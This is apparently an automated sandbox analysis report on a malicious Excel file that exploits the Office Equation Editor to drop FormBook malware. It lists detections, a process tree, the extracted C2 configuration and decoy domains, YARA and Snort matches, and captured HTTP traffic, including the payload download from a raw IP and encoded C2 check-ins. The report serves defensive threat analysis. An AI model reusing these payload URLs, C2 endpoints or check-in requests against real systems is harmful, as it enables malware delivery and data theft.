Windows Analysis Report ORDER CONFIRMATION.xlsx

Overview

General Information

Sample Name: ORDER CONFIRMATION.xlsx
Analysis ID: 483668
MD5: e1e18c326feb4aea3a983f390e0e36c2
SHA1: 7d0abdd1c61dac8dfb411fde050381149fa1aaff
SHA256: a53f9cefce2fc02da9726d54387b05952a3956b9da65c6927c96250b44099d9a
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2920 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2808 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2976 cmdline: 'C:\Users\Public\vbc.exe' MD5: 989933E361010648C467C6D7B6C2D812)
      • vbc.exe (PID: 836 cmdline: C:\Users\Public\vbc.exe MD5: 989933E361010648C467C6D7B6C2D812)
      • vbc.exe (PID: 2636 cmdline: C:\Users\Public\vbc.exe MD5: 989933E361010648C467C6D7B6C2D812)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • ipconfig.exe (PID: 1012 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
          • cmd.exe (PID: 2688 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hanlansmojitovillage.net/nthe/"], "decoy": ["omelhorcurso-online.com", "ttjk020.com", "urfavvpimp.com", "touchmytag.com", "allianzbersamamu.com", "menucoders.com", "goldmig.com", "optplm.com", "ramblersattic.com", "thehendrixcollection.com", "angelsmoonsexshop.com", "indianajones.club", "tageslinsen.info", "thscore2.com", "onpar-golf.com", "youcanaskmeto.review", "overseaexpert.com", "1977991.com", "eurolajd.com", "thefoxshack.com", "bubblelized.com", "texasvoterregistration.com", "denme.net", "sprtnet.com", "aedenpure.com", "yourdoor.pro", "oakridge-pm.com", "swoldiersnation.com", "com-security.center", "prostockbeisbol.com", "mailbroadcastdelivery.club", "fihglobal.com", "hiphopventuresllc.com", "ambrieclothing.com", "colorfulcreativeco.com", "mysahuarita.com", "gibadugi.com", "asoboawa.com", "requotation.com", "wolford.mobi", "ndfvkwnew.icu", "thaysay.net", "thaibinhgear.com", "minhscribe.com", "americanstonesusa.com", "dindigulvysya.com", "tomrings.com", "plasticplank.com", "societegenerol.com", "jrufexsh.com", "ujulus.club", "cpb.site", "bhfhf.com", "yamano-ue.com", "vivorelle.com", "groundedheavens.com", "realstyleworks.com", "vicdux.world", "kegeratorcollective.com", "gamemavn.com", "authorjameswshepherdonline.com", "kankanlol.com", "renatradingbv.com", "ponnyridning.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings are listed beneath each row)
00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 198.23.212.143, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2808, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2808, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2808, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2976
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2808, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2976

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook (the extracted configuration is the one listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: ORDER CONFIRMATION.xlsx; Virustotal: Detection: 32%
Source: ORDER CONFIRMATION.xlsx; ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match; File source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.plasticplank.com/nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P; Avira URL Cloud: Label: malware
Source: http://198.23.212.143/ddr/vbc.exe; Avira URL Cloud: Label: malware
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; Joe Sandbox ML: detected
Source: 8.2.vbc.exe.400000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ipconfig.pdb; source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
Source: Binary string: ipconfig.pdbN; source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb; source: vbc.exe, ipconfig.exe
Source: global traffic; DNS query: name: www.americanstonesusa.com
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 198.23.212.143:80
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 198.23.212.143:80
Source: excel.exe; Memory has grown: Private usage: 4MB later: 69MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.98.99.30:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.98.99.30:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.98.99.30:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 184.168.131.241:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 184.168.131.241:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 184.168.131.241:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49180 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49180 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49180 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49182 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49182 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49182 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49185 -> 34.98.99.30:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49185 -> 34.98.99.30:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49185 -> 34.98.99.30:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49186 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49186 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49186 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49188 -> 184.168.131.241:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49188 -> 184.168.131.241:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49188 -> 184.168.131.241:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49195 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49195 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49195 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49197 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49197 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49197 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49200 -> 34.98.99.30:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49200 -> 34.98.99.30:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49200 -> 34.98.99.30:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Domain query: www.americanstonesusa.com
Source: C:\Windows\explorer.exe; Network Connect: 34.98.99.30 80
Source: C:\Windows\explorer.exe; Domain query: www.realstyleworks.com
Source: C:\Windows\explorer.exe; Domain query: www.plasticplank.com
Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe; Network Connect: 192.99.131.252 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.hanlansmojitovillage.net/nthe/
Source: Joe Sandbox View; ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View; ASN Name: OVHFR OVHFR
Source: global traffic; HTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1 | Host: www.americanstonesusa.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1 | Host: www.plasticplank.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1 | Host: www.realstyleworks.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1 | Host: www.authorjameswshepherdonline.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1 | Host: www.hanlansmojitovillage.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1 | Host: www.thaysay.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1 | Host: www.onpar-golf.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 15 Sep 2021 16:16:33 GMT | Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9 | Last-Modified: Wed, 15 Sep 2021 03:32:23 GMT | ETag: "87e00-5cc0058a7b386" | Accept-Ranges: bytes | Content-Length: 556544 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload | Data Raw: (hex dump of the 556544-byte MZ/PE response body omitted)
Source: global traffic; HTTP traffic detected: GET /ddr/vbc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 198.23.212.143 | Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://java.sun.com
      Source: explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
      Source: explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: explorer.exe, 00000009.00000000.483450971.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: explorer.exe, 00000009.00000000.486663706.0000000003E50000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
      Source: explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://treyresearch.net
      Source: explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000009.00000000.483450971.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
      Source: CFE3BF36.emf.0.dr | String found in binary or memory: http://www.day.com/dam/1.0
      Source: explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
      Source: explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: explorer.exe, 00000009.00000000.503345454.00000000044E7000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000009.00000000.487570517.000000000447A000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://support.mozilla.org
      Source: ipconfig.exe, 0000000B.00000002.688497436.00000000026B2000.00000004.00020000.sdmp | String found in binary or memory: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CFE3BF36.emf
      Source: unknown | DNS traffic detected: queries for: www.americanstonesusa.com
      Source: global traffic | HTTP traffic detected:
        GET /ddr/vbc.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 198.23.212.143
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1
        Host: www.americanstonesusa.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic | HTTP traffic detected:
        GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
        Host: www.plasticplank.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic | HTTP traffic detected:
        GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1
        Host: www.realstyleworks.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic | HTTP traffic detected:
        GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1
        Host: www.authorjameswshepherdonline.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic | HTTP traffic detected:
        GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1
        Host: www.hanlansmojitovillage.net
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic | HTTP traffic detected:
        GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
        Host: www.thaysay.net
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic | HTTP traffic detected:
        GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
        Host: www.onpar-golf.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:

      E-Banking Fraud:

      Yara detected FormBook
